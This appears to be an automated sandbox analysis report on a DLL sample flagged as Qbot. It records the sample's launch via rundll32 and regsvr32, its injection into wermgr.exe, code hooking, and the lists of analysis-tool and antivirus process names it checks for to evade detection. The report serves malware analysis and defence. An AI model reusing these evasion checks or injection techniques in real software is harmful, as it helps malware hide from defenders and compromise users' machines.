          Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\pebbles.dat.dll,DllUnregisterServer
          Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\wermgr.exe C:\Windows\SysWOW64\wermgr.exe
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\wermgr.exe C:\Windows\SysWOW64\wermgr.exe
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\wermgr.exe C:\Windows\SysWOW64\wermgr.exe
          Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\pebbles.dat.dll,bewailable
          Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\pebbles.dat.dll",#1Jump to behavior
          Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\pebbles.dat.dllJump to behavior
          Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\pebbles.dat.dll,DllRegisterServerJump to behavior
          Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\pebbles.dat.dll,DllUnregisterServerJump to behavior
          Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\pebbles.dat.dll,bewailableJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\pebbles.dat.dll",#1Jump to behavior
          Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\wermgr.exe C:\Windows\SysWOW64\wermgr.exeJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\wermgr.exe C:\Windows\SysWOW64\wermgr.exeJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\wermgr.exe C:\Windows\SysWOW64\wermgr.exeJump to behavior
          Source: C:\Windows\SysWOW64\wermgr.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\QyioamjynJump to behavior
          Source: classification engineClassification label: mal96.troj.evad.winDLL@20/1@0/0
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_0316E485 CoInitializeEx,CoInitializeSecurity,CoCreateInstance,SysAllocString,CoSetProxyBlanket,3_2_0316E485
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_0316BAF6 CreateToolhelp32Snapshot,Process32First,FindCloseChangeNotification,3_2_0316BAF6
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\pebbles.dat.dll",#1
          Source: C:\Windows\SysWOW64\wermgr.exeMutant created: \Sessions\1\BaseNamedObjects\{87A9C091-A3AF-4261-9AFC-CA51D21F1994}
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5868:120:WilError_01
          Source: C:\Windows\SysWOW64\wermgr.exeMutant created: \Sessions\1\BaseNamedObjects\{5CABA7A4-044A-4BD5-8AE5-94537A2F3136}
          Source: C:\Windows\SysWOW64\wermgr.exeMutant created: \Sessions\1\BaseNamedObjects\Global\{5CABA7A4-044A-4BD5-8AE5-94537A2F3136}
          Source: pebbles.dat.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
          Source: pebbles.dat.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
          Source: pebbles.dat.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
          Source: pebbles.dat.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: pebbles.dat.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
          Source: pebbles.dat.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
          Source: pebbles.dat.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT
          Source: pebbles.dat.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: E:\cpp\out\out\desktop.pdb source: regsvr32.exe, 00000003.00000002.252814839.000000006D954000.00000080.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.253212407.000000006D954000.00000080.00000001.01000000.00000003.sdmp, rundll32.exe, 00000005.00000002.252999477.000000006D954000.00000080.00000001.01000000.00000003.sdmp, pebbles.dat.dll
          Source: Binary string: amstream.pdb source: wermgr.exe, 00000007.00000003.254565864.0000000003051000.00000004.00000800.00020000.00000000.sdmp, wermgr.exe, 00000008.00000003.254363547.0000000003491000.00000004.00000800.00020000.00000000.sdmp, wermgr.exe, 00000009.00000003.253774638.0000000002F31000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: amstream.pdbGCTL source: wermgr.exe, 00000007.00000003.254565864.0000000003051000.00000004.00000800.00020000.00000000.sdmp, wermgr.exe, 00000008.00000003.254363547.0000000003491000.00000004.00000800.00020000.00000000.sdmp, wermgr.exe, 00000009.00000003.253774638.0000000002F31000.00000004.00000800.00020000.00000000.sdmp
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_0317CB95 push esi; iretd 3_2_0317CB9A
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_0317AEB6 push cs; iretd 3_2_0317AE8A
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_0317ADB4 push cs; iretd 3_2_0317AE8A
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_0317B066 push ebx; ret 3_2_0317B067
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0347CB95 push esi; iretd 4_2_0347CB9A
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0347AEB6 push cs; iretd 4_2_0347AE8A
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0347ADB4 push cs; iretd 4_2_0347AE8A
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0347B066 push ebx; ret 4_2_0347B067
          Source: pebbles.dat.dllStatic PE information: section name: .reloc6s
          Source: pebbles.dat.dllStatic PE information: section name: .hata
          Source: pebbles.dat.dll.9.drStatic PE information: section name: .reloc6s
          Source: pebbles.dat.dll.9.drStatic PE information: section name: .hata
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_0316EF38 LoadLibraryA,GetProcAddress,3_2_0316EF38
          Source: initial sampleStatic PE information: section where entry point is pointing to: .data
          Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\pebbles.dat.dll
          Source: initial sampleStatic PE information: section name: .data entropy: 7.0153365923230595
          Source: C:\Windows\SysWOW64\wermgr.exeFile created: C:\Users\user\Desktop\pebbles.dat.dllJump to dropped file

          Hooking and other Techniques for Hiding and Protection

          barindex
          Overwrites code with unconditional jumps - possibly settings hooks in foreign process
          Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: PID: 5988 base: 983C50 value: E9 42 26 2E 02 Jump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 5996 base: 983C50 value: E9 42 26 3C 02 Jump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 6004 base: 983C50 value: E9 42 26 03 02 Jump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          barindex
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
          Source: wermgr.exe, 00000009.00000003.256661385.0000000004AD3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCMON.EXE
          Source: wermgr.exe, 00000009.00000003.256661385.0000000004AD3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SYSANALYZER.EXEN
          Source: wermgr.exe, 00000009.00000003.256661385.0000000004AD3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PETOOLS.EXE,
          Source: wermgr.exe, 00000009.00000003.256574110.0000000002FA8000.00000004.00000800.00020000.00000000.sdmp, wermgr.exe, 00000009.00000003.256625217.0000000002FA8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: WINDUMP.EXE+
          Source: wermgr.exe, 00000009.00000003.256661385.0000000004AD3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROC_ANALYZER.EXE,
          Source: wermgr.exe, 00000009.00000003.256661385.0000000004AD3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FRIDA-WINJECTOR-HELPER-32.EXE
          Source: wermgr.exe, 00000009.00000003.256574110.0000000002FA8000.00000004.00000800.00020000.00000000.sdmp, wermgr.exe, 00000009.00000003.256625217.0000000002FA8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: TCPDUMP.EXE,
          Source: wermgr.exe, 00000009.00000003.256661385.0000000004AD3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FRIDA-WINJECTOR-HELPER-64.EXE
          Source: wermgr.exe, 00000009.00000003.256661385.0000000004AD3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FRIDA-WINJECTOR-HELPER-32.EXE*
          Source: wermgr.exe, 00000009.00000003.256661385.0000000004AD3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: IMPORTREC.EXE
          Source: wermgr.exe, 00000009.00000003.256661385.0000000004AD3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FRIDA-WINJECTOR-HELPER-64.EXEL
          Source: wermgr.exe, 00000009.00000003.256661385.0000000004AD3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PETOOLS.EXE
          Source: wermgr.exe, 00000009.00000003.256574110.0000000002FA8000.00000004.00000800.00020000.00000000.sdmp, wermgr.exe, 00000009.00000003.256625217.0000000002FA8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: TCPDUMP.EXE
          Source: wermgr.exe, 00000009.00000003.256574110.0000000002FA8000.00000004.00000800.00020000.00000000.sdmp, wermgr.exe, 00000009.00000003.256625217.0000000002FA8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: WINDUMP.EXE
          Source: wermgr.exe, 00000009.00000003.256661385.0000000004AD3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCMON.EXE,
          Source: wermgr.exe, 00000009.00000003.256661385.0000000004AD3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROC_ANALYZER.EXE
          Source: wermgr.exe, 00000009.00000003.256661385.0000000004AD3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SNIFF_HIT.EXE
          Source: wermgr.exe, 00000009.00000003.256661385.0000000004AD3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: IMPORTREC.EXE,
          Source: wermgr.exe, 00000009.00000003.256661385.0000000004AD3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SYSANALYZER.EXE
          Source: C:\Windows\SysWOW64\regsvr32.exe TID: 5908Thread sleep count: 135 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\regsvr32.exe TID: 5960Thread sleep count: 106 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\wermgr.exe TID: 5992Thread sleep count: 59 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\wermgr.exe TID: 6000Thread sleep count: 41 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\wermgr.exe TID: 6052Thread sleep time: -90000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\wermgr.exe TID: 6064Thread sleep time: -135000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_4-14149
          Source: C:\Windows\SysWOW64\regsvr32.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_3-13968
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\rundll32.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_4-11544
          Source: C:\Windows\SysWOW64\regsvr32.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_3-11548
          Source: C:\Windows\SysWOW64\regsvr32.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_0316DDE7 GetSystemInfo,3_2_0316DDE7
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_0316C123 FindFirstFileW,FindNextFileW,3_2_0316C123
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0346C123 FindFirstFileW,FindNextFileW,4_2_0346C123
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_0316EF38 LoadLibraryA,GetProcAddress,3_2_0316EF38

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Maps a DLL or memory area into another process
          Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: unknown target: C:\Windows\SysWOW64\wermgr.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeSection loaded: unknown target: C:\Windows\SysWOW64\wermgr.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeSection loaded: unknown target: C:\Windows\SysWOW64\wermgr.exe protection: execute and read and writeJump to behavior
          Writes to foreign memory regions
          Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: C:\Windows\SysWOW64\wermgr.exe base: 2C90000Jump to behavior
          Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: C:\Windows\SysWOW64\wermgr.exe base: 983C50Jump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\wermgr.exe base: 2D70000Jump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\wermgr.exe base: 983C50Jump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\wermgr.exe base: 29E0000Jump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\wermgr.exe base: 983C50Jump to behavior
          Allocates memory in foreign processes
          Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: C:\Windows\SysWOW64\wermgr.exe base: 2C90000 protect: page read and writeJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: C:\Windows\SysWOW64\wermgr.exe base: 2D70000 protect: page read and writeJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: C:\Windows\SysWOW64\wermgr.exe base: 29E0000 protect: page read and writeJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\pebbles.dat.dll",#1Jump to behavior
          Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\wermgr.exe C:\Windows\SysWOW64\wermgr.exeJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\wermgr.exe C:\Windows\SysWOW64\wermgr.exeJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\wermgr.exe C:\Windows\SysWOW64\wermgr.exeJump to behavior
          Source: C:\Windows\SysWOW64\regsvr32.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\wermgr.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\wermgr.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\regsvr32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_0316A1F8 GetSystemTimeAsFileTime,3_2_0316A1F8
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_0316DFC2 GetCurrentProcessId,GetLastError,GetSystemMetrics,GetVersionExA,GetWindowsDirectoryW,3_2_0316DFC2
          Source: regsvr32.exe, 00000003.00000003.245712695.0000000004FAF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.245952470.00000000050FF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.246272113.0000000004DDF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: bdagent.exe
          Source: regsvr32.exe, 00000003.00000003.245712695.0000000004FAF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.245952470.00000000050FF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.246272113.0000000004DDF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vsserv.exe
          Source: regsvr32.exe, 00000003.00000003.245712695.0000000004FAF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.245952470.00000000050FF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.246272113.0000000004DDF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: avp.exe
          Source: regsvr32.exe, 00000003.00000003.245712695.0000000004FAF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.245952470.00000000050FF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.246272113.0000000004DDF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: avgcsrvx.exe
          Source: regsvr32.exe, 00000003.00000003.245712695.0000000004FAF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.245952470.00000000050FF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.246272113.0000000004DDF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: mcshield.exe
          Source: regsvr32.exe, 00000003.00000003.245712695.0000000004FAF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.245952470.00000000050FF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.246272113.0000000004DDF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: MsMpEng.exe

          Stealing of Sensitive Information

          barindex
          Yara detected Qbot
          Source: Yara matchFile source: 8.2.wermgr.exe.2d40000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.0.wermgr.exe.2d40000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.3.regsvr32.exe.3140000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.3.rundll32.exe.4a40000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.0.wermgr.exe.2c60000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.3.rundll32.exe.32e0000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.rundll32.exe.4a60000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.rundll32.exe.3460000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.0.wermgr.exe.2d40000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.wermgr.exe.2c60000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.3.regsvr32.exe.3140000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.rundll32.exe.4a60000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.regsvr32.exe.3160000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.3.rundll32.exe.4a40000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.wermgr.exe.2d40000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.rundll32.exe.3460000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.wermgr.exe.29b0000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.wermgr.exe.29b0000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.wermgr.exe.2c60000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.regsvr32.exe.3160000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.0.wermgr.exe.2c60000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.3.rundll32.exe.32e0000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000003.00000002.252637894.0000000003160000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000003.245679829.00000000032E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000000.252174416.00000000029B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000000.251843249.0000000002C60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000003.245541502.0000000003140000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.254770959.0000000002D40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000000.251930910.0000000002D40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.252831702.0000000004A60000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000003.246084770.0000000004A40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.254795791.0000000002C60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.252645898.0000000003460000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY

          Remote Access Functionality

          barindex
          Yara detected Qbot
          Source: Yara matchFile source: 8.2.wermgr.exe.2d40000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.0.wermgr.exe.2d40000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.3.regsvr32.exe.3140000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.3.rundll32.exe.4a40000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.0.wermgr.exe.2c60000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.3.rundll32.exe.32e0000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.rundll32.exe.4a60000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.rundll32.exe.3460000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.0.wermgr.exe.2d40000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.wermgr.exe.2c60000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.3.regsvr32.exe.3140000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.rundll32.exe.4a60000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.regsvr32.exe.3160000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.3.rundll32.exe.4a40000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.wermgr.exe.2d40000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.rundll32.exe.3460000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.wermgr.exe.29b0000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.wermgr.exe.29b0000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.wermgr.exe.2c60000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.regsvr32.exe.3160000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.0.wermgr.exe.2c60000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.3.rundll32.exe.32e0000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000003.00000002.252637894.0000000003160000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000003.245679829.00000000032E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000000.252174416.00000000029B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000000.251843249.0000000002C60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000003.245541502.0000000003140000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.254770959.0000000002D40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000000.251930910.0000000002D40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.252831702.0000000004A60000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000003.246084770.0000000004A40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.254795791.0000000002C60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.252645898.0000000003460000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid Accounts3
          Native API          		1
